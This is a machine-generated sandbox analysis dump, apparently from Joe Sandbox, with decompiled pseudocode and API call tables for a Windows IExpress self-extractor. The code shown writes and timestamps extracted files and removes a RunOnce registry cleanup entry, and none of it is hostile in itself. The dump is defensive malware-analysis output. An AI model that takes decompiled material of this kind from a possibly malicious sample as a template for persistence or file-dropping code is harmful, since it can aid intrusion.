                                                                        0x003d5316
                                                                        0x003d5316
                                                                        0x003d5317
                                                                        0x003d531c
                                                                        0x003d531f
                                                                        0x003d5333
                                                                        0x003d5345
                                                                        0x003d5351
                                                                        0x003d5359
                                                                        0x003d5359
                                                                        0x003d5363
                                                                        0x003d5369
                                                                        0x003d536f
                                                                        0x003d5374
                                                                        0x003d5374
                                                                        0x003d5381
                                                                        0x003d5387
                                                                        0x003d5387
                                                                        0x003d538f
                                                                        0x003d53a0

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(02B58300,00000080,?,00000000), ref: 003D52F2
                                                                        • DeleteFileA.KERNELBASE(02B58300), ref: 003D52FA
                                                                        • LocalFree.KERNEL32(02B58300,?,00000000), ref: 003D5305
                                                                        • LocalFree.KERNEL32(02B58300), ref: 003D530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(003D11FC,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D5363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D5334
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 2833751637-1955631000
                                                                        • Opcode ID: 99f9aaf07a33bc60e95c22cc5f8d8485b5d4357cf71433f437ad5c7a34041428
                                                                        • Instruction ID: c5e48ecddcea2d82ac29a53068a3e1600b4b917c7491cbcf0b71e710ba2abae4
                                                                        • Opcode Fuzzy Hash: 99f9aaf07a33bc60e95c22cc5f8d8485b5d4357cf71433f437ad5c7a34041428
                                                                        • Instruction Fuzzy Hash: EB218E37912A14DFDB239F24FD09B6977A8BB14751F05015BE882563A0CFB46D98CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D1FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        
                                                                        				if( *0x3d8530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                        						return RegCloseKey(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}





                                                                        0x003d1fee
                                                                        0x003d2005
                                                                        0x003d200d
                                                                        0x003d2017
                                                                        0x00000000
                                                                        0x003d2020
                                                                        0x003d200d
                                                                        0x003d2029

                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,003D538C,?,?,003D538C), ref: 003D2005
                                                                        • RegDeleteValueA.KERNELBASE(003D538C,wextract_cleanup0,?,?,003D538C), ref: 003D2017
                                                                        • RegCloseKey.ADVAPI32(003D538C,?,?,003D538C), ref: 003D2020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                        • API String ID: 849931509-702805525
                                                                        • Opcode ID: a0ca5cd15a7c5ddc84c575dc7f20b68439bec42985a3b2087f5adc44b97b6ff4
                                                                        • Instruction ID: 53f7f9aea2f92bbd19114d7b187a8e9a94504dd545a48e1c66ab58a621354bdc
                                                                        • Opcode Fuzzy Hash: a0ca5cd15a7c5ddc84c575dc7f20b68439bec42985a3b2087f5adc44b97b6ff4
                                                                        • Instruction Fuzzy Hash: A0E08632951318BBD7238F90FD0AF5A7B2EFB01740F100297F904A0160EB716E14E605
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D4CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0x3d91d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E003D4E99(_t75);
                                                                        						L35:
                                                                        						return E003D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0x3d8584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0x3d91e4;
                                                                        						_t58 = 0x3d91e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0x3d91e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0x3d91e4;
                                                                        						_t30 = E003D4702( &_v268, 0x3d91e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E003D476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E003D4980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E003D47E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0x3d93f4 =  *0x3d93f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0x3d91e4;
                                                                        						_t63 = 0x3d91e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0x3d91e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0x3d91e4;
                                                                        						_t30 = E003D4702( &_v268, 0x3d91e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E003D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E003D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E003D4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}































                                                                        0x003d4cd0
                                                                        0x003d4cdb
                                                                        0x003d4ce0
                                                                        0x003d4ce2
                                                                        0x003d4cee
                                                                        0x003d4cf2
                                                                        0x003d4d0e
                                                                        0x003d4d0e
                                                                        0x003d4d11
                                                                        0x003d4e83
                                                                        0x003d4e88
                                                                        0x003d4e98
                                                                        0x003d4e98
                                                                        0x003d4d17
                                                                        0x003d4d17
                                                                        0x003d4d1a
                                                                        0x003d4d2f
                                                                        0x003d4d2f
                                                                        0x00000000
                                                                        0x003d4d2f
                                                                        0x003d4d1c
                                                                        0x003d4d1c
                                                                        0x003d4d1f
                                                                        0x003d4dcb
                                                                        0x003d4dd0
                                                                        0x003d4dd2
                                                                        0x003d4ddd
                                                                        0x003d4ddd
                                                                        0x003d4de3
                                                                        0x003d4de8
                                                                        0x003d4ded
                                                                        0x003d4ded
                                                                        0x003d4def
                                                                        0x003d4df0
                                                                        0x003d4df0
                                                                        0x003d4df4
                                                                        0x003d4df4
                                                                        0x003d4df6
                                                                        0x003d4df9
                                                                        0x003d4dfc
                                                                        0x003d4dfc
                                                                        0x003d4dfe
                                                                        0x003d4dff
                                                                        0x003d4dff
                                                                        0x003d4e03
                                                                        0x003d4e08
                                                                        0x003d4e0a
                                                                        0x003d4e0f
                                                                        0x003d4d03
                                                                        0x003d4d03
                                                                        0x00000000
                                                                        0x003d4d03
                                                                        0x003d4e18
                                                                        0x003d4e20
                                                                        0x003d4e25
                                                                        0x003d4e27
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4e33
                                                                        0x003d4e38
                                                                        0x003d4e3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4e40
                                                                        0x003d4e51
                                                                        0x003d4e56
                                                                        0x003d4e5b
                                                                        0x003d4e5e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4e6a
                                                                        0x003d4e6f
                                                                        0x003d4e71
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4e77
                                                                        0x003d4e7d
                                                                        0x00000000
                                                                        0x003d4e7d
                                                                        0x003d4d25
                                                                        0x003d4d25
                                                                        0x003d4d28
                                                                        0x003d4d36
                                                                        0x003d4d3b
                                                                        0x003d4d40
                                                                        0x003d4d40
                                                                        0x003d4d42
                                                                        0x003d4d43
                                                                        0x003d4d43
                                                                        0x003d4d47
                                                                        0x003d4d4a
                                                                        0x003d4d4a
                                                                        0x003d4d4c
                                                                        0x003d4d4f
                                                                        0x003d4d4f
                                                                        0x003d4d51
                                                                        0x003d4d52
                                                                        0x003d4d52
                                                                        0x003d4d56
                                                                        0x003d4d5b
                                                                        0x003d4d5d
                                                                        0x003d4d62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4d67
                                                                        0x003d4d6f
                                                                        0x003d4d74
                                                                        0x003d4d76
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4d7c
                                                                        0x003d4d84
                                                                        0x003d4d89
                                                                        0x003d4d8b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4d94
                                                                        0x003d4d99
                                                                        0x003d4d9e
                                                                        0x003d4da1
                                                                        0x003d4daa
                                                                        0x003d4daa
                                                                        0x003d4da3
                                                                        0x003d4da3
                                                                        0x003d4da3
                                                                        0x003d4db5
                                                                        0x003d4dbb
                                                                        0x003d4dbd
                                                                        0x00000000
                                                                        0x003d4dc3
                                                                        0x003d4dc5
                                                                        0x00000000
                                                                        0x003d4dc5
                                                                        0x003d4dbd
                                                                        0x003d4d2a
                                                                        0x003d4d2a
                                                                        0x003d4d2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4d2d
                                                                        0x003d4cf8
                                                                        0x003d4cfd
                                                                        0x003d4d02
                                                                        0x00000000

                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 003D4DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 003D4DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 3625706803-1955631000
                                                                        • Opcode ID: 05a9a8556d7bc5c462f357a70929462e6e1e8964c88e9acda87d8c86824f4606
                                                                        • Instruction ID: 38936d8eca2baf7a8319f440c7c9c71edce1a32be0e855960d1ee92b25eb1b2f
                                                                        • Opcode Fuzzy Hash: 05a9a8556d7bc5c462f357a70929462e6e1e8964c88e9acda87d8c86824f4606
                                                                        • Instruction Fuzzy Hash: E841F3372001019BCB379F38FD546B573AAEB45300F05466BE8D69B786DA31DE5AC790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D4C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0x3d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0x3d8d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}








                                                                        0x003d4c40
                                                                        0x003d4c4a
                                                                        0x003d4c8d
                                                                        0x00000000
                                                                        0x003d4c70
                                                                        0x003d4c70
                                                                        0x003d4c7e
                                                                        0x003d4c86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d4c8a

                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 003D4C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003D4C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 003D4C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: 88427d75adfc867e307a433d40a30f4e9579d063b2b1561418b04d9c0b6132b4
                                                                        • Instruction ID: 1d5152aa3b96abc7bd20280f5ca67471eb849044ebb638b5ebf56c9d2565082c
                                                                        • Opcode Fuzzy Hash: 88427d75adfc867e307a433d40a30f4e9579d063b2b1561418b04d9c0b6132b4
                                                                        • Instruction Fuzzy Hash: E0F0907361220DBF9B26DFB5ED49DBB77ADEB04340B44062BB816C2190FA30E914D7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E003D487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                        				} else {
                                                                        					if((__edx & 0x00000400) == 0) {
                                                                        						asm("sbb esi, esi");
                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                        					} else {
                                                                        						_t23 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                        					return _t7;
                                                                        				} else {
                                                                        					E003D490C(_t11);
                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                        				}
                                                                        			}







                                                                        0x003d4880
                                                                        0x003d488c
                                                                        0x003d4894
                                                                        0x003d48a0
                                                                        0x003d48c9
                                                                        0x003d48ce
                                                                        0x003d48a2
                                                                        0x003d48a8
                                                                        0x003d48b7
                                                                        0x003d48bc
                                                                        0x003d48aa
                                                                        0x003d48ac
                                                                        0x003d48ac
                                                                        0x003d48a8
                                                                        0x003d48de
                                                                        0x003d48e7
                                                                        0x003d490b
                                                                        0x003d48ee
                                                                        0x003d48f0
                                                                        0x00000000
                                                                        0x003d4902

                                                                        APIs
                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,003D4A23,?,003D4F67,*MEMCAB,00008000,00000180), ref: 003D48DE
                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,003D4F67,*MEMCAB,00008000,00000180), ref: 003D4902
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 0dcb80d992d95a2620c2b7294e06398d255e4c9750ca5dd4a22c18b63f7f2e36
                                                                        • Instruction ID: be76f4426a897a00eda821396cde303898b9700c3627c5fb99fd3c6da4c5e826
                                                                        • Opcode Fuzzy Hash: 0dcb80d992d95a2620c2b7294e06398d255e4c9750ca5dd4a22c18b63f7f2e36
                                                                        • Instruction Fuzzy Hash: 0C018BA3E125302BF326402AAC88FB7460CCB96771F1B0332BDEAE72C1D2744C0091E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E003D4AD0(signed int _a4, void* _a8, long _a12) {
                                                                        				signed int _t9;
                                                                        				int _t12;
                                                                        				signed int _t14;
                                                                        				signed int _t15;
                                                                        				void* _t20;
                                                                        				struct HWND__* _t21;
                                                                        				signed int _t24;
                                                                        				signed int _t25;
                                                                        
                                                                        				_t20 =  *0x3d858c; // 0x270
                                                                        				_t9 = E003D3680(_t20);
                                                                        				if( *0x3d91d8 == 0) {
                                                                        					_push(_t24);
                                                                        					_t12 = WriteFile( *(0x3d8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                        					if(_t12 != 0) {
                                                                        						_t25 = _a12;
                                                                        						if(_t25 != 0xffffffff) {
                                                                        							_t14 =  *0x3d9400; // 0x8fc00
                                                                        							_t15 = _t14 + _t25;
                                                                        							 *0x3d9400 = _t15;
                                                                        							if( *0x3d8184 != 0) {
                                                                        								_t21 =  *0x3d8584; // 0x0
                                                                        								if(_t21 != 0) {
                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3d93f8, 0);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t25 = _t24 | 0xffffffff;
                                                                        					}
                                                                        					return _t25;
                                                                        				} else {
                                                                        					return _t9 | 0xffffffff;
                                                                        				}
                                                                        			}











                                                                        0x003d4ad5
                                                                        0x003d4adb
                                                                        0x003d4ae7
                                                                        0x003d4aee
                                                                        0x003d4b05
                                                                        0x003d4b0d
                                                                        0x003d4b14
                                                                        0x003d4b1a
                                                                        0x003d4b1c
                                                                        0x003d4b21
                                                                        0x003d4b2a
                                                                        0x003d4b2f
                                                                        0x003d4b31
                                                                        0x003d4b39
                                                                        0x003d4b54
                                                                        0x003d4b54
                                                                        0x003d4b39
                                                                        0x003d4b2f
                                                                        0x003d4b0f
                                                                        0x003d4b0f
                                                                        0x003d4b0f
                                                                        0x003d4b5e
                                                                        0x003d4ae9
                                                                        0x003d4aed
                                                                        0x003d4aed

                                                                        APIs
                                                                          • Part of subcall function 003D3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003D369F
                                                                          • Part of subcall function 003D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36B2
                                                                          • Part of subcall function 003D3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003D36DA
                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 003D4B05
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                        • String ID:
                                                                        • API String ID: 1084409-0
                                                                        • Opcode ID: 9b16797a01057913350c1c620db1d2c6d1b2f63cbcb948b5d5f8a7864a9113db
                                                                        • Instruction ID: c4f08dc06aa5343826d9e4a52a9313d530d39ad32da5c9639c4591d79d61aeab
                                                                        • Opcode Fuzzy Hash: 9b16797a01057913350c1c620db1d2c6d1b2f63cbcb948b5d5f8a7864a9113db
                                                                        • Instruction Fuzzy Hash: 04018C32201205ABDB168F69FC05BA2776DEB58725F058227F9799B2E0CB70D812CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D658A(char* __ecx, void* __edx, char* _a4) {
                                                                        				intOrPtr _t4;
                                                                        				char* _t6;
                                                                        				char* _t8;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				char* _t16;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t18;
                                                                        				char* _t19;
                                                                        
                                                                        				_t16 = __ecx;
                                                                        				_t10 = __edx;
                                                                        				_t17 = __ecx;
                                                                        				_t1 = _t17 + 1; // 0x3d8b3f
                                                                        				_t12 = _t1;
                                                                        				do {
                                                                        					_t4 =  *_t17;
                                                                        					_t17 = _t17 + 1;
                                                                        				} while (_t4 != 0);
                                                                        				_t18 = _t17 - _t12;
                                                                        				_t2 = _t18 + 1; // 0x3d8b40
                                                                        				if(_t2 < __edx) {
                                                                        					_t19 = _t18 + __ecx;
                                                                        					if(_t19 > __ecx) {
                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                        						if( *_t8 != 0x5c) {
                                                                        							 *_t19 = 0x5c;
                                                                        							_t19 =  &(_t19[1]);
                                                                        						}
                                                                        					}
                                                                        					_t6 = _a4;
                                                                        					 *_t19 = 0;
                                                                        					while( *_t6 == 0x20) {
                                                                        						_t6 = _t6 + 1;
                                                                        					}
                                                                        					return E003D16B3(_t16, _t10, _t6);
                                                                        				}
                                                                        				return 0x8007007a;
                                                                        			}












                                                                        0x003d6592
                                                                        0x003d6594
                                                                        0x003d6596
                                                                        0x003d6598
                                                                        0x003d6598
                                                                        0x003d659b
                                                                        0x003d659b
                                                                        0x003d659d
                                                                        0x003d659e
                                                                        0x003d65a2
                                                                        0x003d65a4
                                                                        0x003d65a9
                                                                        0x003d65b2
                                                                        0x003d65b6
                                                                        0x003d65ba
                                                                        0x003d65c3
                                                                        0x003d65c5
                                                                        0x003d65c8
                                                                        0x003d65c8
                                                                        0x003d65c3
                                                                        0x003d65c9
                                                                        0x003d65cc
                                                                        0x003d65d2
                                                                        0x003d65d1
                                                                        0x003d65d1
                                                                        0x00000000
                                                                        0x003d65dc
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(003D8B3E,003D8B3F,00000001,003D8B3E,-00000003,?,003D60EC,003D1140,?), ref: 003D65BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
